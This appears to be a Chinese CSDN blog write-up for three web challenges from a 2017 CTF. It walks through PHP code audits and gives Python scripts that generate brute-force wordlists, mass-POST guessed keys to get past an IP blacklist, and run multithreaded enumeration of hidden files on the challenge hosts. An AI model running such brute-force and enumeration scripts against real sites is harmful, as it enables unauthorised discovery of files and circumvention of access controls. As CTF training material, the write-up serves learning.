“百度杯”2017年春秋欢乐赛 Web wp

最新推荐文章于 2024-09-28 00:15:00 发布
最新推荐文章于 2024-09-28 00:15:00 发布
阅读量227 收藏 1
点赞数 1
分类专栏: CTF writeup 文章标签: web安全 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63138919/article/details/132001160
版权
CTF 同时被 2 个专栏收录
24 篇文章 0 订阅
订阅专栏
writeup
13 篇文章 0 订阅
订阅专栏

一.时间

1.打开这道题 出现一堆代码

2.审计代码

show_source() :函数对文件进行语法高亮显示

cookie中的token值如果等于 hello,就执行下面的代码

file_get_contents() 把flag.php文件内容读取到$txt变量中

mt_rand()取随机数,比rand()快4倍,而且如果mt_rand(1,10)的话1和10都会取得到的

通过md5对mt_rand取值的加密然后拼接'u/'和'.txt'得到文件的名字存入到$filename中

file_put_contents()把$txt的内容写入到$filename的文件中取

sleep(10):休眠10秒

unlink() :删除文件
大概的意思就是 从flag.php中提取文本内容到$txt变量中,再随机产生一个1-1000的数字进行md5加密作为文件名$filename,最后把$txt的内容放入$filename文件中去。接着睡眠10秒,最终删除该文件。
另外这道题不需要用到cookie欺骗

所有我们来跑目录,这里我们需要把所有会出现的文件名的可能性都列出来当成字典来跑

3.脚本生成字典

MD5加密python脚本:

hash = hashlib.md5()

hash.update('加密的文本'.encode('utf-8'))

print(hash.hexdigest())

py脚本:

import hashlib
import requests
file = open("shijian.txt",'w+')
for i in range(1,1001):
	m = hashlib.md5()
	m.update(str(i).encode())
	mid = m.hexdigest()
	url = 'u/'+mid+'.txt'
	file.write(url+'\n')
file.close()

这里就生成一个shijian.txt的文本 然后里面是生成的脚本字典字典 

4.利用御剑进行字典爆破

御剑下载地址:http://www.rsdown.cn/down/42311.html

注意: 

1)勾选的"PHP:1000",是我在配置文件中把原来的PHP.txt的内容换成了前面shijian.txt的内容。

2)我们用御剑刷新下网页赶紧跑,并且打开网页,要不然10秒后就要删除

3)线程项调至60以上(太小会导致扫描太慢以至于错过10秒)

5.得到flag

二.攻击

 1.打开环境 一堆代码

2.审计代码

$_SERVER['REMOTE_ADDR']  //正在浏览当前页面用户的 IP 地址。

分析所给的PHP代码可知:
(1)若当前IP与$ip变量的内容相同,则提示信息直接退出。
(2)当POST中某id的键值等于'attack'时,打印$flag。这个id为$flag的第五个位置开始,长度为3的一个字符串。
(3)如果不满足(2),则检查POST的变量个数,大于0则把你当前的IP加入到黑名单中(故一个IP只能攻击一次,失败了就要重新创建题目)

没办法,只能穷举$flag中从第六的位置开始的长度为3的字符串,然后将所有穷举出来的结果post方式,一次性提交,这种方法的前提是要猜$flag中有哪些字符。如果少了某个字符,就不能通过,ip也进入黑名单,只能重新获取题目网站了

3.写入python脚本

import requests
a = "1234567890"
data = {}
for i in a:
    for j in a:
        for k in a:
            data[i+j+k]="attack"
print(data)        
r=requests.post("http://0c3aac1c986c47feacdb2c322a123112c0d2364b864a40ad.ctf.game/",data=data)
print(r.text)

4.获得flag

 

三.象棋

1.打开环境

 进去就是一个象棋页面 跟它玩了几把之后发现被骗了 啥也没有 然后就查看了一下源码

然后就找到了一个特别敏感的地方

发现正则公式,怀疑是flag文件 

规则:url+/js/+abcmlyx中的两位+ctf+0-9中三位+.js

文件名为"abcmlyx"中取2个字母,"0123456789"中取3个数字,例如 js/abctf123.js

2.解题方法

(1)直接python脚本获取

import requests
import threading
import queue
from queue import Queue


def text():
    url = 'http://eci-2zed18dkqjv2mmqbnhw0.cloudeci1.ichunqiu.com/js/'
    strs = 'abcmlyx'
    num = '0123456789'
    for i in strs:
        for j in strs:
            for h in num:
                for l in num:
                    for n in num:
                        new_url = url + i + j + 'ctf' + h + l + n + '.js'
                        q.put(new_url)


def requ():
    while not q.empty():
        u = q.get(True, 1)
        try:
            r = requests.get(u).text
            if '404' not in r:
                print(r)
            q.task_done()
        except:
            q.put(u)


if __name__ == '__main__':
    q = Queue()
    text()
    for each in range(300):
        t = threading.Thread(target=requ)
        t.daemon = True
        t.start()

    q.join()

(2)利用python写个字典 然后利用御剑进行爆破获得flag

 1.建立脚本

代码:

key1 = "abcmlyx"
 
key2 = "0123456789"
 
file = open("xiangqi.txt","w+")
 
 
for a in key1:
 
    for b in key1:
 
        for c in key2:
 
            for d in key2:
 
                for e in key2:
 
                    url="/js/"+a+b+"ctf"+str(c)+str(d)+str(e)+".js"+"\n"
 
                    file.write(url)
 
file.close()

2.得到字典后,用御剑进行爆破得到flag文件 

勾选的"PHP:49000",是我在配置文件中把原来的PHP.txt的内容换成了前面xiangqi.txt的内容

这样也可获得flag 

 

 

 

W3nd4L0v3
关注
专栏目录
WP 4 i春秋_2017年春秋欢乐
segOt
04-20 4526
时间 象棋 时间 多线程、爆破 这道题目给出如下源码<?php header("content-type:text/html;charset=utf-8"); '天下武功唯快不破'; setcookie('token','hello'); show_source(__FILE__); if ($_COOKIE['token']=='hello'){ $txt = file_get_cont
百度”CTF比2017年2月场WP--web
Oavinci的博客
06-02 997
一、爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于“李华”。就是说,你可以通过这个全局数组来访问任何一个变量,所有已经定义过的变量都可以在里面通过变量名索引得到。 preg_match函数返回值为匹配到的次数。 审计代码可以知道,我们可以用GET传值方式?hello=...
WP 4 i春秋_细说春秋
segOt
04-16 1014
图穷匕见 纸上谈兵 窃符救赵 老马识途 东施效颦 大义灭亲 三令五申i春秋中一些非常简单的题目——传送门。题目的引子都是春秋战国时期的典故,也算应了网站名称的景,故事还是颇为有趣的,题目比较简单。图穷匕见题目给出了一个图片,如下:从题目名称就可以看出,这幅图的末尾应该附加了一些信息。打开发现果然如此 附加了一系列二进制串,ascii解码之后得到明显是url编码的东西,直接解码得到结果。(其中比较坑
WP 4 i春秋_internetwache-ctf-2016
segOt
04-16 2242
The hidden message Quick run rock-with-the-wired-shark The hidden message 辨识八进制,ascii转换,base64 Description: My friend really can’t remember passwords. So he uses some kind of obfuscation. Can you re
2022年春秋网络安全春季 勇者山峰部分WP
大雾
05-08 2419
Misc 签到 题目描述:题目内容:因为疫情,有多久没听到上课铃声了。 (如果你还不知道怎么签到,关注“春秋伽玛”公众号,回复“上课铃声”可以拿到进一步提示) 关注公众号回复上课铃声得到 照着按就完了 最终按对会出个弹框跳转到有flag的页面 flag{27033a89-55dd-46dc-82b9-cd89a4da957d} tiger 题目描述:无 从中可以发现因此: ag2a`f76 是 rot47 加密,解密为:28a217fe rot47解密 PNG 图片是 LSB 加密lsb解密工具 解.
百度”CTF比 2017 二月场 wp
qq_61768489的博客
04-04 1507
目录 爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器 爆破-1 flag在一个长度为6的变量里面 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> $$a ,.
2021春秋秋季部分wp
xiaopangding09的博客
11-29 3736
时间:11月27
Web】CTFSHOW元旦水友部分wp
uuzeray的博客
01-02 4095
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
2017年第三届 美亚电子取证 团体 wp
ShenZ的博客
11-20 1305
17美亚团体 wp
2021年春秋网络安全秋季 勇者山峰部分wp
weixin_52829570的博客
11-28 1161
1.签到题-Crypto Vigenere 根据题目Vigenere可看出是维吉尼亚密码 使用在线网站破解 https://guballa.de/vigenere-solver flag:53d613fc-6c5c-4dd6-b3ce-8bc867c6f648 2.Misc helloshark 一张图片 010打开发现16进制有许多PK字样,对图片进行分离处理(foremost) 果然隐藏了压缩包,但是压缩包设置了密码,提示密码在图片里 猜测图片存在LSB隐写
i春秋第二届春秋欢乐RSA256writeup
iqiqiya的博客
03-15 5167
i春秋第二届春秋欢乐writeup下载之后进行解压 发现四个文件0x01看到题目是RSA的  又看到public.key 所以直接用kali linux的openssl0x02可以看到e就是Exponent的值 而n的十六进制为Modules  我们用python转成十进制0x03 再将n进行因式分解来得到我们的p和q (推荐使用http://factordb.com/)0x04最后一步 我用的...
2022强网web方向wp
xjh8023的博客
08-01 1522
考点文件泄露,、文件上传、文件包含、反序列化1.扫描目录存在www.zip,存在源码泄露2.代码审计,写一个inc文件内容为上传该文件,修改类型为image/jpeg2.进行反序列化,new一个类3.抓包将反序列化的值赋值给userfile,发包得到fla。...
i春秋Web-Upload(第一届“百度”信息安全攻防总决 线上选拔)
Sea_Sand息禅
05-15 2199
查看源码: 告诉我们要上传一个ichunqiu的参数,但是貌似并没有找所谓的find,bp抓包看到响应中有flag的响应头: 但是解码之后上传得到的还是没上传一样的情况,响应头中的flag的内容改变了,网页也告诉我们be a fast man,所以就要写脚本了: import requests import base64 url = 'http://dc587a4fbff7497...
网络安全详解
weidl001的博客
09-21 1479
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
网络安全证书考取相关知识
aa98865646的博客
09-21 743
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 711
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全全方略
AI逍遥子
09-25 1284
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
信息安全工程师(24)网络安全体系建设原则与安全策略
最新发布
m0_73399576的博客
09-28 662
信息安全工程师——网络安全体系建设原则与安全策略篇
Linux 网络安全守护:构建安全防线的最佳实践
weixin_62641226的博客
09-23 973
通过定期更新系统、强化用户权限管理、配置防火墙、使用SSH安全连接、定期备份数据、监控系统日志以及安装安全工具,用户可以有效提升Linux系统的安全性,构建坚固的网络安全防线。Linux系统通常内置了防火墙工具,如`iptables`和`firewalld`。用户应根据实际需求,设置合适的规则,限制不必要的端口和服务。可以使用`rsync`、`tar`等工具进行备份,确保在发生安全事件时能够快速恢复。此外,定期审查用户账户和权限,及时删除不再使用的账户,确保只有必要的用户能够访问系统。
2021陇剑线下 wp
09-02
2021陇剑线下wp指的是该比的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比wp示例,帮助你理解wp的含义。 通常,比wp是指参者提出的在比中胜出的最佳方案。这种方案可能涉及各种因素,包括创新性、技术实施、解决问题的方法和效率等。具体来说,一个好的wp可能包括以下几个要素: 1. 题目分析:清晰理解比的题目和要求,明确问题的关键点和目标。 2. 解决方案:提出独特、创新和可行的解决方案,展示自己的技术和专业知识。 3. 实施计划:描述实施该方案的详细步骤和时间表,包括资源的分配和团队协作。 4. 风险分析:识别潜在的风险和挑战,并提供解决方法和备选方案。 5. 评估指标:明确关键的评估指标和成功的标准,展示方案的效果和可衡量的结果。 在许多比中,评委会或专家小组会对参者提交的wp进行评审,选出最佳的方案。一个优秀的wp将会体现出创新性、可行性和适应性。并且,一个优秀的方案通常能够提供有说服力的理由来解释为什么这个方案是最好的,以及为什么它比其他方案更优秀。 总的来说,2021陇剑线下wp是指在比中成功的方案,这个方案提供了创新、可行和有效的解决问题的方法,并且能够清晰地展示其技术和团队的能力。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W3nd4L0v3

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值